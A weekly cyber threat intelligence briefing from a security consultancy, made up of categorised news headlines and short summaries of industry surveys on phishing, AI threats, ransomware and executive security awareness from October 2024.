Microsoft Warns of Russian Spear-Phishing Attacks Targeting Over 100 Organisations - SecurityWeek
Russian Hackers Pose as Microsoft Employees in Email Phishing Attacks
Facebook Businesses Targeted in Infostealer Phishing Campaign
Cyber criminals are leveraging big retail names in attacks this holiday season | TechRadar
Over a thousand online shops hacked to show fake product listings
Russian spies using remote desktop protocol files to phish • The Register
New Xiu Gou Phishing Kit Targets US, Other Countries with Mascot - Infosecurity Magazine
Hackers are swiping cookies to bypass email security, FBI says - UPI.com
APT29 Spearphishing Campaign Targets Thousands with RDP Files - Infosecurity Magazine
German MPs and their staff fail simple phishing attack test | Tom's Hardware
Russia Is Targeting US Officials in Email Phishing Campaign: Microsoft - Bloomberg
Ukraine Warns of Mass Phishing Campaign Targeting Citizens Data - Infosecurity Magazine
Business Email Compromise (BEC)/Email Account Compromise (EAC)
BEC cyber attacks have the highest financial impact - Digital Journal
Business email compromise scams dominate Q3 2024 threats
The Weapon of Choice of Cyber Criminals: BEC Impersonation
Phishers reach targets via Eventbrite services - Help Net Security
AI-Powered BEC Scams Zero in on Manufacturers - Infosecurity Magazine
Other Social Engineering
Cyber Scams & Why We Fall for Them - Security Boulevard
BEC cyber attacks have the highest financial impact - Digital Journal
Banks and regulators warn of rise in ‘quishing’ QR code scams
Hackers Sent a Deepfake of Wiz CEO to Dozens of Employees | Entrepreneur
Fraudsters revive old tactics mixed with modern technology - Help Net Security
How Hackers Exploit Google To Target You
Mishing in Motion: Uncovering the Evolving Functionality of FakeCall Malware - Zimperium
Artificial Intelligence
In legal first, Japan convicts man of abusing AI to generate ransomware | Malay Mail
Hackers Sent a Deepfake of Wiz CEO to Dozens of Employees | Entrepreneur
Mozilla: ChatGPT Can Be Manipulated Using Hex Code
AI Cyber Attacks Rise but Businesses Still Lack Insurance - Security Boulevard
Future capabilities of AI-powered threats
How artificial intelligence is lowering the barrier to cyber crime
Trust and risk in the AI era - Help Net Security
White House Issues New Directive on AI and National Security | UC Berkeley School of Information
Apple is challenging hackers to break into the company's servers | Fortune
Regulators Combat Deepfakes With Anti-Fraud Rules
80 percent believe cyber security skills will be vital in AI environments
2FA/MFA
New Windows Warning As Hacker Breaks Google Chrome 2FA Security Encryption
Malware
New Windows Driver Signature bypass allows kernel rootkit installs
Police hacks, disrupts Redline, Meta infostealer operations - Help Net Security
'All servers' for Redline and Meta infostealers hacked by Dutch police and FBI
Malvertising Campaign Hijacks Facebook Accounts to Spread SYS01stealer Malware
New Xiu Gou Phishing Kit Targets US, Other Countries with Mascot - Infosecurity Magazine
BeaverTail Malware Resurfaces in Malicious npm Packages Targeting Developers
Kremlin-backed hackers have new Windows and Android malware to foist on Ukrainian foes
Why Wiping Your Hard Drive Doesn't Always Remove Malware
Mishing in Motion: Uncovering the Evolving Functionality of FakeCall Malware - Zimperium
Government Sector Suffers 236% Surge in Malware Attacks - Infosecurity Magazine
Bots/Botnets
Microsoft: Chinese hackers use Quad7 botnet to steal credentials
Mobile
Macron's bodyguards show his location by sharing Strava data • The Register
Google Warns Of New Android And Windows Cyber Attack—1 Thing Stops It
Android malware "FakeCall" now reroutes bank calls to attackers
These Samsung phones are at risk for a big security vulnerability | Digital Trends
Russia Targets Ukraine Army via Spoofed Recruitment App
Denial of Service/DoS/DDoS
DDoS attacks surge to unprecedented levels, bombarding servers with 4.2Tbps | Cybernews
Is DDoS being left out in the cold by regulations? | TechFinitive
Russia arrests hacker accused of preventing electronic voting during local election
Internet of Things – IoT
Government Warns Foreign Tech In Cars Is Vulnerable To Hackers, Proposes Ban
IoT needs more respect for its consumers, creations, and itself - Help Net Security
Hackers target critical zero-day vulnerability in PTZ cameras
Data Breaches/Leaks
Free, France’s second largest ISP, confirms data breach after leak
ICO: 55% of UK Adults Have Had Data Lost or Stolen - Infosecurity Magazine
Hacker claims to have data linked to 19 million French mobile and internet customers | ITPro
Over 80% of US Small Businesses Have Been Breached - Infosecurity Magazine
OnePoint Patient Care Data Breach Exposes 795,000 Records
Cyber security Breaches Survey 2024: Impact of Cyber Crime | SC Media UK
Combatting Human Error: How To Safeguard Your Business Against Costly Data Breaches
Organised Crime & Criminal Actors
Russia sentences REvil ransomware members to over 4 years in prison
How artificial intelligence is lowering the barrier to cyber crime
REvil convictions unlikely to curb Russian cyber crime | TechTarget
Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain
Insider Risk and Insider Threats
Ex-Disney techie arrested for potentially deadly menu hacks • The Register
The Overlooked Importance of Identifying Riskiest Users
Combatting Human Error: How To Safeguard Your Business Against Costly Data Breaches
Insider threat hunting best practices and tools | TechTarget
Insurance
AI Cyber Attacks Rise but Businesses Still Lack Insurance - Security Boulevard
Supply Chain and Third Parties
Third-Party Identities: The Weakest Link in Your Cyber Security Supply Chain
How the NIS2 Directive Impacts Supply Chain Cyber Security
Cloud/SaaS
AWS CDK flaw exposed accounts to full takeover • The Register
Black Basta Ransomware Operators Using Microsoft Teams To Breach Organisations
Adversarial groups adapt to exploit systems in new ways - Help Net Security
The SaaS Governance Gap | Grip Security - Security Boulevard
NIS2 Arrives with Major Changes to EU SaaS Cyber Security - Security Boulevard
What the CrowdStrike outage teaches us about cloud security | SC Media
China's 'Evasive Panda' APT Debuts High-End Cloud Hijacking
Black Basta operators phish employees via Microsoft Teams - Help Net Security
Hackers find 15,000 credentials by scanning for git configuration | CyberScoop
Chinese Hackers Use CloudScout Toolset to Steal Session Cookies from Cloud Services
New Details Emerge About Expansive TeamTNT Attacks | MSSP Alert
Outages
Delta Sues CrowdStrike Over ‘Catastrophic’ Software Glitch – BNN Bloomberg
What the CrowdStrike outage teaches us about cloud security | SC Media
When Cyber Security Tools Backfire
The Case Against Abandoning CrowdStrike Post-Outage
Identity and Access Management
Third-Party Identities: The Weakest Link in Your Cyber Security Supply Chain
Three common privilege access mistakes that can lead to a ransomware incident | SC Media
Encryption
Quantum Computing and Cyber Security – Preparing for a New Age of Threats | MSSP Alert
How to achieve crypto-agility and future-proof security | TechTarget
Linux and Open Source
Admins Spring into action over latest open source vuln • The Register
Hardening Linux Servers Against Threats and Attacks | Linux Journal
Passwords, Credential Stuffing & Brute Force Attacks
The state of password security in 2024 - Help Net Security
Hackers find 15,000 credentials by scanning for git configuration | CyberScoop
Microsoft: Chinese hackers use Quad7 botnet to steal credentials
Social Media
Malvertising Campaign Hijacks Facebook Accounts to Spread SYS01stealer Malware
Stolen credit cards up for grabs on Meta’s Threads • The Register
Facebook Businesses Targeted in Infostealer Phishing Campaign
Malicious Ads Are Flooding Facebook: Here's How to Stay Safe
Malvertising
Malvertising Campaign Hijacks Facebook Accounts to Spread SYS01stealer Malware
Malicious Ads Are Flooding Facebook: Here's How to Stay Safe
Training, Education and Awareness
For a Stronger Security Culture, Replace Sticks With Carrots
3 crucial considerations for your security awareness and training program | CSO Online
Regulations, Fines and Legislation
NIS2 Arrives with Major Changes to EU SaaS Cyber Security - Security Boulevard
NIS2 directive impact | Professional Security Magazine
NIS2 Compliance Puts Strain on Business Budgets - Infosecurity Magazine
Cyber Security | UK Regulatory Outlook October 2024 - Osborne Clarke | Osborne Clarke
UK organisations scrambling to divert funds for NIS2 compliance spending | ITPro
The SEC is Cracking Down on Misleading Cyber Security Disclosure | Fenwick & West LLP - JDSupra
Industry trade groups still have ‘concerns’ with cyber reporting mandate | CyberScoop
Is DDoS being left out in the cold by regulations? | TechFinitive
Regulators Combat Deepfakes With Anti-Fraud Rules
Models, Frameworks and Standards
NIS2 Arrives with Major Changes to EU SaaS Cyber Security - Security Boulevard
NIS2 directive impact | Professional Security Magazine
UK organisations scrambling to divert funds for NIS2 compliance spending | ITPro
Backup and Recovery
Is Backup Testing Part of Your Security Strategy? | HackerNoon
Data Protection
ICO: 55% of UK Adults Have Had Data Lost or Stolen - Infosecurity Magazine
Careers, Working in Cyber and Information Security
99% of CISOs work extra hours every week - Help Net Security
Mastering Cyber Security: A Comprehensive Guide to Self-Learning - Security Boulevard
Aldi managers paid more than government cyber security expert
UK needs cyber security professionals, but won't pay up • The Register
80 percent believe cyber security skills will be vital in AI environments
The Government Wants You to Fight Cyber Crime. Do You Have What It Takes?
Cyber security Awareness Month: 5 new AI skills cyber pros need
Law Enforcement Action and Take Downs
In legal first, Japan convicts man of abusing AI to generate ransomware | Malay Mail
Alexander McCartney: Catfish killer brought down by one phone call - BBC News
Police hacks, disrupts Redline, Meta infostealer operations - Help Net Security
'All servers' for Redline and Meta infostealers hacked by Dutch police and FBI
Two notorious infostealer malware operations were just knocked offline | ITPro
FBI has conducted more than 30 disruption operations in 2024 | CyberScoop
REvil convictions unlikely to curb Russian cyber crime | TechTarget
Russia arrests hacker accused of preventing electronic voting during local election
Misinformation, Disinformation and Propaganda
Senator says domain reg firms aiding Russian disinfo spread • The Register
Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity
Cyber Warfare and Cyber Espionage
What can businesses learn from the rise of cyber espionage?
Nation State Actors
Cyber threats surge from state-sponsored and criminal actors
China
China's 'Evasive Panda' APT Debuts High-End Cloud Hijacking
US says Chinese hackers breached multiple telecom providers
Microsoft: Chinese hackers use Quad7 botnet to steal credentials
Government Warns Foreign Tech In Cars Is Vulnerable To Hackers, Proposes Ban
Chinese Hackers Use CloudScout Toolset to Steal Session Cookies from Cloud Services
Inside Sophos' 5-Year War With the Chinese Hackers Hijacking Its Devices | WIRED
Chinese hackers targeted phones used by Trump and Vance, New York Times reports - The Hindu
Donald Trump and JD Vance potential targets of China cyber attack - BBC News
Chinese Hackers Reportedly Targeted Trump, Vance Phones
China's Elite Cyber Corps Hone Skills on Virtual Battlefields
Russia and China-linked state hackers intensify attacks on Netherlands, security officials warn
Beijing claims its found spy devices at sea • The Register
Canada Faces 'Second-to-None' PRC-Backed Threat Actors
Russia
Russia Carrying Out Targeted Attacks In UK, Microsoft Warns
Amazon seizes domains used in rogue Remote Desktop campaign to steal data
New Cyber Attack Warning—Confirming You Are Not A Robot Can Be Dangerous
APT29 Spearphishing Campaign Targets Thousands with RDP Files - Infosecurity Magazine
Google Warns Of New Android And Windows Cyber Attack—1 Thing Stops It
Microsoft Warns of Russian Spear-Phishing Attacks Targeting Over 100 Organisations - SecurityWeek
Russian Hackers Pose as Microsoft Employees in Email Phishing Attacks
Russian spies using remote desktop protocol files to phish • The Register
Senator says domain reg firms aiding Russian disinfo spread • The Register
Russia’s ‘Midnight Blizzard’ hackers target government workers in novel info-stealing campaign
Kremlin-backed hackers have new Windows and Android malware to foist on Ukrainian foes
Sweden and Norway rethink cashless society plans over Russia security fears | Sweden | The Guardian
Pro-Russia hackers claim Greater Manchester council cyber attacks - BBC News
Kremlin-linked hackers target Ukraine’s state, military agencies in new espionage campaign
Russia and China-linked state hackers intensify attacks on Netherlands, security officials warn
Russia Targets Ukraine Army via Spoofed Recruitment App
Russia Is Targeting US Officials in Email Phishing Campaign: Microsoft - Bloomberg
Ukraine Warns of Mass Phishing Campaign Targeting Citizens Data - Infosecurity Magazine
REvil convictions unlikely to curb Russian cyber crime | TechTarget
Russia sentences REvil ransomware members to over 4 years in prison
Iran
Cyber threats surge from state-sponsored and criminal actors
Iran Hackers Peddle Stolen Trump Emails
North Korea
Cyber threats surge from state-sponsored and criminal actors
Tools and Controls
For a Stronger Security Culture, Replace Sticks With Carrots
Threat actors are stepping up their tactics to bypass email protections - Help Net Security
The Overlooked Importance of Identifying Riskiest Users
Is Backup Testing Part of Your Security Strategy? | HackerNoon
The SaaS Governance Gap | Grip Security - Security Boulevard
Proactive and responsible disclosure | Professional Security Magazine
When Cyber Security Tools Backfire
What Military Wargames Can Teach Us About Cyber Security
Attack surface management: The key to securing expanding digital frontiers | SC Media
New report reveals persistent API security breaches risk
Hackers are swiping cookies to bypass email security, FBI says - UPI.com
US, Australia Release New Security Guide for Software Makers - SecurityWeek
More Than Just a Corporate Wiki? How Threat Actors are Exploiting Confluence - Security Boulevard
Why cyber tools fail SOC teams - Help Net Security
Into the Wild: Using Public Data for Cyber Risk Hunting
API Security Matters: The Risks of Turning a Blind Eye - SecurityWeek
Designing a Future-focused Cyber Security Investment Strategy - SecurityWeek
The Power of Proactive Risk Assessments in Cyber Security - Security Boulevard
Risk hunting: A proactive approach to cyber threats - Help Net Security
Top 10 Cyber Security Metrics and KPIs | Mimecast
Apple opens Private Cloud Compute to public scrutiny • The Register
German MPs and their staff fail simple phishing attack test | Tom's Hardware
Insider threat hunting best practices and tools | TechTarget
How IT leaders can assess “secure-by-design” software claims | CIO
Companies are spending barely any IT budget on security | TechRadar
Reports Published in the Last Week
Other News
Small Businesses Boosting Cyber Security as Threats Grow: ITRC - Security Boulevard
13 Cyber Crime Facts That Will Give You Chills | HackerNoon
Spooky Cyber Stats and Trends in Time for Halloween
Five Eyes Agencies Launch Startup Security Initiative - Infosecurity Magazine
Five Eyes tell tech startups to take infosec seriously • The Register
Terrifying Trends in the 2024 Cyber Threat Landscape - Security Boulevard
Stop being a sitting target for cyber threats! | TechRadar
Healthcare Breaches Costliest for 12 Years Running, Hit New $10.1M Record High
Irish businesses now facing more than one cyber attack per week
Funding crisis ‘puts universities at higher risk of cyber attacks’
CISA Launches First International Cyber Security Plan - Infosecurity Magazine
Lateral Movement in Recent Cyber Security Breaches - Security Boulevard
Government Sector Suffers 236% Surge in Malware Attacks - Infosecurity Magazine
US, Australia Release New Security Guide for Software Makers - SecurityWeek
Proactive & Preventative Cyber Defence - DevX
OT security becoming a mainstream concern | CSO Online
Microsoft delays its troubled AI-powered Recall feature yet again | ZDNET
Vulnerability Management
Many financial firms have high-severity software security flaws over a year old | TechRadar
Put End-of-Life Software to Rest
Microsoft Update Warning—400 Million Windows PCs Now At Risk
A Sherlock Holmes Approach to Cyber Security: Eliminate the Impossible with Exposure Validation
Microsoft will charge Windows 10 users $30 per year for security updates | Tom's Hardware
Vulnerabilities
Apple Patches Over 70 Vulnerabilities Across iOS, macOS, Other Products - SecurityWeek
New tool bypasses Google Chrome’s new cookie encryption system
AWS CDK flaw exposed accounts to full takeover • The Register
New Cisco ASA and FTD features block VPN brute-force password attacks
New Windows Driver Signature bypass allows kernel rootkit installs
Fog ransomware targets SonicWall VPNs to breach corporate networks
Patched SonicWall critical vulnerability still used in several ransomware attacks | CSO Online
Researchers Uncover OS Downgrade Vulnerability Targeting Microsoft Windows Kernel
New Research Reveals Spectre Vulnerability Persists in Latest AMD and Intel Processors
Wi-Fi Alliance test suite has a worrying security flaw | TechRadar
New Windows Warning As Hacker Breaks Google Chrome 2FA Security Encryption
Synology, QNAP, TrueNAS Address Vulnerabilities Exploited at Pwn2Own Ireland - SecurityWeek
Google Patches Critical Chrome Vulnerability Reported by Apple - SecurityWeek
LiteSpeed Cache Plugin Vulnerability Poses Admin Access Risk - Infosecurity Magazine
Admins Spring into action over latest open source vuln • The Register
Opera Browser Fixes Big Security Hole That Could Have Exposed Your Information
These Samsung phones are at risk for a big security vulnerability | Digital Trends
CVE-2024-9680 – Mozilla Firefox Security Vulnerability – October 2024 - Security Boulevard
Hackers target critical zero-day vulnerability in PTZ cameras
Sector Specific
Industry specific threat intelligence reports are available.
Contact us to receive tailored reports specific to the industry/sector and geographies you operate in.
· Automotive
· Construction
· Critical National Infrastructure (CNI)
· Defence & Space
· Education & Academia
· Energy & Utilities
· Estate Agencies
· Financial Services
· FinTech
· Food & Agriculture
· Gaming & Gambling
· Government & Public Sector (including Law Enforcement)
· Health/Medical/Pharma
· Hotels & Hospitality
· Insurance
· Legal
· Manufacturing
· Maritime & Shipping
· Oil, Gas & Mining
· OT, ICS, IIoT, SCADA & Cyber-Physical Systems
· Retail & eCommerce
· Small and Medium Sized Businesses (SMBs)
· Startups
· Telecoms
· Third Sector & Charities
· Transport & Aviation
· Web3
Contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.
Look out for our ‘Cyber Tip Tuesday’ video blog and on our YouTube channel.
You can also follow us on Facebook, Twitter and LinkedIn.
Links to articles are for interest and awareness and linking to or reposting external content does not endorse any service or product, likewise we are not responsible for the security of external links.
Black Arrow Cyber Threat Intelligence Briefing 25 October 2024
Black Arrow Cyber Threat Intelligence Briefing 25 October 2024:
-Overconfidence in Cyber Security: A Hidden Risk
-Gallagher Re Study Links Cyber Security Gaps to Higher Insurance Claims
-AI and Deepfakes Fuel Phishing Scams, Making Detection Harder
-AI-Generated Cyber Threats Have C-Suite Leaders on Edge
-The Single Biggest Vulnerability in Your Cyber Security Is You
-Why Cyber Security Acumen Matters in the C-Suite
-Cyber Incidents Surge, Damaging Brand Trust and Business Relationships – Hiscox
-Cyber Resilience vs Cyber Security: Which is More Critical?
-Phishing Attacks Snare Security and IT Leaders
-CISO Role Gaining Influence as 20% Report Directly to CEOs, Finds Survey
-Threat Actors Are Exploiting Vulnerabilities Faster Than Ever
-Employees Lack Fundamental Security Awareness
Welcome to this week’s Black Arrow Cyber Threat Intelligence Briefing – a weekly digest, collated and curated by our cyber experts to provide senior and middle management with an easy to digest round up of the most notable threats, vulnerabilities, and cyber related news from the last week.
Top Cyber Stories of the Last Week
Overconfidence in Cyber Security: A Hidden Risk
Organisations often assume that adding more cyber security tools equates to better protection, yet this overconfidence can lead to blind spots. Companies with fragmented solutions are 3.5 times more likely to face major security incidents. The Uber data breach in 2022 illustrated how alert fatigue—where excessive notifications overwhelm teams—can lead to overlooked threats, even with advanced tools in place. To counter this, experts recommend streamlining cyber security systems, prioritising critical alerts, and regularly auditing security processes. Building a resilient defence isn’t about quantity but the strategic use of technology paired with continuous training and monitoring.
Gallagher Re Study Links Cyber Security Gaps to Higher Insurance Claims
Gallagher Re's recent study, using data from Bitsight and its own cyber incident records, highlights that gaps in cyber security increase the risk of incidents and insurance claims. Organisations with larger cyber footprints, such as extensive IP address networks, are particularly vulnerable, pointing to a need for insurers to consider technographic data alongside traditional metrics. The study suggests that targeted use of external scanning data could help insurers lower loss ratios by up to 16.4%, focusing on the most damaging risks. Basic cyber hygiene, including rapid patching and endpoint management, remains essential for mitigating incidents and reducing potential claims.
AI and Deepfakes Fuel Phishing Scams, Making Detection Harder
Teleport's study highlights that AI-powered impersonation and deepfake-driven phishing are now the hardest cyber threats for businesses to defend against, with 52% of respondents marking these as particularly challenging. AI has enabled cyber criminals to create highly convincing phishing scams targeting credentials, significantly lowering both the cost and skill needed to launch attacks. Despite the adoption of AI tools by 68% of organisations to combat these threats, overconfidence in AI's protective capabilities may be risky.
AI-Generated Cyber Threats Have C-Suite Leaders on Edge
AI-driven cyber attacks are becoming a major concern for senior executives, as sophisticated deepfakes and AI phishing scams pose evolving risks. A recent gathering of over 100 cyber security leaders in Silicon Valley highlighted the growing difficulty in combating AI-powered phishing attacks, with three-quarters of surveyed Fortune 500 security officers reporting significant challenges. Additionally, over half noted the increasing prevalence of deepfake audio and video impersonations. The threat is amplified by AI tools that often lack proper data governance, potentially exposing organisations to heightened risks from third-party suppliers, with predicted fraud losses in the US expected to climb to $40 billion by 2027.
The Single Biggest Vulnerability in Your Cyber Security Is You
A recent report highlights that human error accounts for 68% of successful cyber attacks, indicating it as a significant vulnerability within cyber security. Despite advances in technical defences, human-centric errors, such as skills-based and knowledge-based mistakes, persist as weak points. Current cyber security education and policy efforts focus largely on technical defences, but often overlook the psychological aspects of behaviour. Experts suggest that minimising cognitive load, fostering a positive cyber security culture, and adopting long-term strategies for behavioural change are crucial to reducing human error and building a more resilient cyber security posture.
Why Cyber Security Acumen Matters in the C-Suite
As generative AI and sophisticated cyber threats rise, the need for cyber security expertise within the C-suite has become critical. Effective leaders must balance AI-driven innovations with a strong cyber security framework to prevent potential breaches. This alignment is essential for strategic decision-making, resource allocation, and collaborative crisis response. Boards and CEOs who understand these risks are better positioned to safeguard data, intellectual property, and reputation. Regulatory expectations are increasing, and companies that prioritise cyber security acumen are better prepared to handle compliance challenges and adapt swiftly to evolving threats.
Cyber Incidents Surge, Damaging Brand Trust and Business Relationships – Hiscox
The latest Hiscox Cyber Readiness Report reveals a surge in cyber incidents, with 70% of UK organisations and 67% globally experiencing increased attacks over the past year. This rise in cyber threats is eroding brand trust and impacting business relationships. Nearly half of affected firms face challenges in attracting new customers, a sharp rise from 20% last year, with 43% reporting a loss of existing customers. Additionally, many organisations have integrated Generative AI, with over half acknowledging heightened cyber risk. Yet, a lack of expertise remains, with 37% of UK businesses underprepared to address these evolving risks.
Cyber Resilience vs Cyber Security: Which is More Critical?
Focusing on cyber resilience is increasingly essential for organisations today. Unlike traditional cyber security, which aims to prevent breaches, cyber resilience emphasises an organisation’s ability to continue operating amidst an incident. By adopting a culture of resilience, organisations can safeguard their operations, data, and reputation—even in the face of a cyber attack. Investing in resilience, beginning with people and culture, offers a strong return as it prepares businesses to adapt quickly to adversities. Moreover, in an era of heightened threats, cyber resilience is becoming a competitive advantage, enhancing trust with customers, stakeholders, and insurers.
Phishing Attacks Snare Security and IT Leaders
A recent survey by Arctic Wolf and Sapio Research highlights persistent vulnerabilities in cyber security culture, despite IT leaders’ high confidence levels. While 80% of leaders feel prepared against phishing, nearly two-thirds admitted to clicking on phishing links themselves. Moreover, 36% of IT leaders have bypassed their own security protocols, exposing organisations to heightened risks. In addition, 68% of security professionals reuse passwords, a significant lapse in cyber hygiene. To address these issues, experts advocate for personalised, behaviour-based training and a proactive reporting culture. Only 60% of firms have adopted AI policies, with just 29% of end users aware of these policies, underscoring a need for clearer communication.
CISO Role Gaining Influence as 20% Report Directly to CEOs, Finds Survey
A recent Deloitte Global survey highlights the increasing strategic importance of cyber security in business, with 20% of chief information security officers (CISOs) now reporting directly to CEOs. Covering responses from nearly 1,200 cyber leaders worldwide, the report shows CISOs are evolving from technical experts to key advisers on cross-business risk and resilience, a role intensified by the rise in AI-driven cyber threats. High-performing organisations lead in integrating AI into cyber defence, aiming for 27% better outcomes. Nearly 60% plan to increase cyber budgets, emphasising the alignment of security initiatives with broader digital investments and strategic growth.
Threat Actors Are Exploiting Vulnerabilities Faster Than Ever
Mandiant’s recent research highlights the urgent need for rapid patching as attackers are now exploiting vulnerabilities within just five days on average, a steep drop from 63 days in 2018. The study, based on 138 vulnerabilities disclosed in 2023, reveals a significant shift toward zero-day exploits, now outpacing N-day vulnerabilities. Zero-day vulnerabilities are unknown to vendors and lack available patches at the time of disclosure; N-day vulnerabilities are security flaws that have already been publicly disclosed and typically have a patch available but may remain unaddressed on systems, creating opportunities for cyber attacks. The report underscores that while patching is essential, implementation can be slow, particularly across large systems, mobile devices, or critical infrastructure where operational disruptions pose serious risks.
Employees Lack Fundamental Security Awareness
A recent Fortinet survey highlights growing concern among executives regarding employee cyber security awareness, with 70% stating their teams lack essential knowledge – a significant increase from last year. Over 60% expect a rise in employee-targeted cyber attacks leveraging AI. Positively, 80% of organisations are now more open to implementing security awareness initiatives. Nearly half of these leaders deliver training content quarterly, with phishing prevention as a top focus. The findings underline the necessity of a strong first line of defence, with targeted campaigns and accessible training vital to enhancing organisational cyber resilience.
Sources:
https://www.helpnetsecurity.com/2024/10/24/ai-impersonation-cyberattack-vector/
https://fortune.com/2024/10/24/ai-generated-cyber-threats-c-suite-cfo-leaders-edge/
https://www.sciencealert.com/the-single-biggest-vulnerability-in-your-cyber-security-is-you
https://www.darkreading.com/vulnerabilities-threats/why-cybersecurity-acumen-matters-c-suite
https://betanews.com/2024/10/18/cyber-resilience-vs-cybersecurity-which-is-more-critical/
https://securityboulevard.com/2024/10/phishing-attacks-snare-security-it-leaders/
https://www.techrepublic.com/article/threat-actors-mandiant-report-2024/
https://betanews.com/2024/10/23/employees-lack-fundamental-security-awareness/
Governance, Risk and Compliance
CISOs Concerned Over Growing Demands of Role - Security Boulevard
Lack of investment leaving firms open to cyber attack - PwC – The Irish Times
AI-generated cyber threats have C-suite leaders on edge | Fortune
Poor MFA, identity attacks dominate threat landscape in Q3 2024 | SC Media
Why Cyber Security Acumen Matters in the C-Suite
Overconfidence in Cyber Security: A Hidden Risk
Call for cyber security sea change as world looks to meet rising threats
Joe Sullivan: CEOs must be held accountable for security too | TechTarget
Cyber resilience vs. cybersecurity: Which is more critical? (betanews.com)
CISOs: Throwing Cash at Tools Isn't Helping Detect Breaches (darkreading.com)
CISO role gaining influence as 20% report directly to CEOs, finds survey
CISOs respond: 49% of CISOs plan to leave role without industry action | Security Magazine
In 2025 Security And Risk Pros Will Brace For Regulations And Resilience (forbes.com)
Gartner's 2025 tech trends show how your business needs to adapt - and fast | ZDNET
Effective strategies for measuring and testing cyber resilience - Help Net Security
Why strong cyber security means we must reduce complexity | World Economic Forum
Is the future of tech roles fractional? - BusinessCloud
Achieving peak cyber resilience - Help Net Security
68% of directors don't have a board-approved AI policy - IoD Ireland
Board Members Should Review Cyber Risk Disclosure Procedures Following SEC Enforcement
Best Cyber Security Metrics to Use in the Boardroom | Kovrr - Security Boulevard
CISO Insights: 10 modern capabilities to revamp your security | Fastly
What CIOs Must Consider With Sophos Buying Secureworks
Unclear pricing for GRC tools creates market confusion - Help Net Security
Threats
Ransomware, Extortion and Destructive Attacks
The evolution of cyber crime: How ransomware became the weapon of choice | TechRadar
Healthcare Sees 300% Surge in Ransomware Attacks
ESET partner breached to send data wipers to Israeli orgs (bleepingcomputer.com)
Ransomware Rising – Understanding, Preventing and Surviving Cyber Extortion - Security Boulevard
Akira is encrypting again after abandoning double extortion • The Register
Ransomware Gangs Use LockBit's Fame to Intimidate Victims in Latest Attacks
NotLockBit: Ransomware Discovery Serves As Wake-Up Call For Mac Users | Tripwire
A Dangerous Alliance: Scattered Spider, RansomHub Join Forces
CISA confirms Veeam vulnerability is being used in ransomware attacks (therecord.media)
NotLockBit Ransomware Can Target macOS Devices - SecurityWeek
New Qilin.B Ransomware Variant Emerges with Improved Encryption and Evasion Tactics
Government is fed up with ransomware payments fueling cyber attacks (cnbc.com)
Has BlackCat returned as Cicada3301? Maybe.
Chinese trader laundered more than $17M for Lazarus Group in 25 hacks (cointelegraph.com)
Ransomware protection: AI and strategies to combat rising threats - SiliconANGLE
Ransomware attacks against healthcare orgs is on the rise, Microsoft says (qz.com)
Ransomware is driving an increase in emergency patient care (cyberscoop.com)
Ransomware's ripples felt across ERs as care suffers • The Register
Russia recommends prison sentence for REvil hackers | SC Media
Are Leaders Ready to Break the Ransomware Cycle - Security Boulevard
What's behind the 51% drop in ransomware attacks? (securityintelligence.com)
Organisations Paying Fewer Ransoms, Building Resilience: Kaseya | MSSP Alert
Ransomware Victims
How the ransomware attack at Change Healthcare went down: A timeline | TechCrunch
Radisson’s Country Inn and Suites Allegedly Hit by Ransomware | MSSP Alert
Ransomware's ripples felt across ERs as care suffers • The Register
Henry Schein discloses data breach a year after ransomware attack
50,000 Files Exposed in Nidec Ransomware Attack - Infosecurity Magazine (infosecurity-magazine.com)
Ransomware gang stoops to new low, targets prominent nonprofit for disabled people (therecord.media)
Spate of ransomware attacks on German-speaking schools hits another in Switzerland
Crypt Ghouls Targets Russian Firms with LockBit 3.0 and Babuk Ransomware Attacks (thehackernews.com)
Phishing & Email Based Attacks
Cyber criminal underground “thriving” as weekly attacks surge by 75% in Q3 2024 | ITPro
Evolving cyber criminal tactics targeting SMBs - Help Net Security
Latrodectus Malware Increasingly Used by Cyber Criminals - SecurityWeek
Bumblebee and Latrodectus Malware Return with Sophisticated Phishing Strategies
Top open source email platform hacked to steal user details | TechRadar
AI and deepfakes fuel phishing scams, making detection harder - Help Net Security
Evolving Email Threats and How to Protect Against Them - IT Security Guru
Unknown threat actors exploit Roundcube Webmail flaw in phishing campaign (securityaffairs.com)
Threat actors increasingly using malicious virtual hard drives in phishing attacks | CSO Online
LinkedIn bots and spear phishers target job seekers | Malwarebytes
75% of US Senate Campaign Websites Fail to Implement DMARC - Infosecurity Magazine
Gophish Framework Used in Phishing Campaigns to Deploy Remote Access Trojans (thehackernews.com)
Why Phishing-Resistant MFA Is No Longer Optional: The Hidden Risks of Legacy MFA
Business Email Compromise (BEC)/Email Account Compromise (EAC)
Evolving cyber criminal tactics targeting SMBs - Help Net Security
Other Social Engineering
Experts warn North Koreans are posing as IT workers in the West
'Pig butchering': How cyber criminals target investors with fake trading apps
LinkedIn bots and spear phishers target job seekers | Malwarebytes
HYPR is latest firm to reveal hiring of fraudulent IT worker overseas | CyberScoop
Artificial Intelligence
AI-generated cyber threats have C-suite leaders on edge | Fortune
55% Of Employees Using AI At Work Have No Training On Its Risks (forbes.com)
Hackers are finding new ways to leverage AI - Help Net Security
OpenAI’s voice API can build AI agents for phone scams • The Register
New Cyber Security Warning As 1,000 Elite Hackers Embrace AI
AI and deepfakes fuel phishing scams, making detection harder - Help Net Security
AI tools are being increasingly abused to launch cyber attacks | TechRadar
AI hack: Do not give chatbots your personal data
Cyber Security Teams Largely Ignored in AI Policy Development - Infosecurity Magazine
This new AI jailbreaking technique lets hackers crack models in just three interactions | ITPro
In 2025 Security And Risk Pros Will Brace For Regulations And Resilience (forbes.com)
The rise of the machines and the growing AI identity attack surface | CSO Online
68% of directors don't have a board-approved AI policy - IoD Ireland
AI-Powered Attacks Flood Retail Websites - Infosecurity Magazine
AI honeypot hit 800K times | Cybernews
CIOs under pressure to deliver AI outcomes faster | CIO
2FA/MFA
Poor MFA, identity attacks dominate threat landscape in Q3 2024 | SC Media
Understanding the Importance of MFA: A Comprehensive Guide - Security Boulevard
QR codes are being hijacked to bypass MFA protections | TechRadar
Why Phishing-Resistant MFA Is No Longer Optional: The Hidden Risks of Legacy MFA
Malware
HM Surf macOS vuln potentially exploited by Adloader malware • The Register
Latrodectus Malware Increasingly Used by Cyber Criminals - SecurityWeek
Bumblebee and Latrodectus Malware Return with Sophisticated Phishing Strategies
Over 6,000 WordPress hacked to install plugins pushing infostealers
Over 10M+ Personal And Corporate Devices Infected By Information Stealers (cybersecuritynews.com)
